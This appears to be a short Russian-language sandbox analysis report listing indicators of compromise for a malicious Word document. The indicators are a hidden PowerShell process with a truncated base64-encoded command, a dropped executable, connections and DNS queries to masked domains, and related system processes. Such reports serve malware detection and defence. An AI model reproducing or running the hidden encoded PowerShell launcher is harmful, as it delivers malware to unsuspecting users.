Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABLAHAAZQBoAHYAbgB1AGcAYwBpAHEAcAA9ACcASgBzAHYAcQBsAGIAYwB3AGoAYQBlAHoAdgAnADsAJABSAHEAbwB1AGEAYwBlAHAAIAA9ACAAJwA4ADcAOQAnADsAJABQAHUAeABuAG4AegB4AHcAcgB1AD0AJwBBAHAAbQBjAGgAbwB...
- <SYSTEM32>\conhost.exe
- %HOMEPATH%\879.exe
- %ProgramFiles%\unp\logs\updatenotificationpipeline.001.etl в %ProgramFiles%\unp\logs\updatenotificationpipeline.002.etl
- %ProgramFiles%\UNP\Logs\UpdateNotificationPipeline.001.etl
- 'hg###ghting.com':443
- 'gl######onproperties.com':443
- 'az##ea.com':443
- DNS ASK tr###iabds.com
- DNS ASK ka#####lothhouse.com
- DNS ASK hg###ghting.com
- DNS ASK gl######onproperties.com
- DNS ASK az##ea.com
- DNS ASK ar#.msn.com
- DNS ASK im##########-rt-microsoft-com.akamaized.net
- ClassName: 'OleMainThreadWndClass' WindowName: ''
- '%ProgramFiles(x86)%\microsoft office\office16\winword.exe' /n "<PATH_SAMPLE>.doc" /o ""
- '<SYSTEM32>\apphostregistrationverifier.exe'
- '<SYSTEM32>\devicecensus.exe' UserCxt
- '<SYSTEM32>\svchost.exe' -k netsvcs -p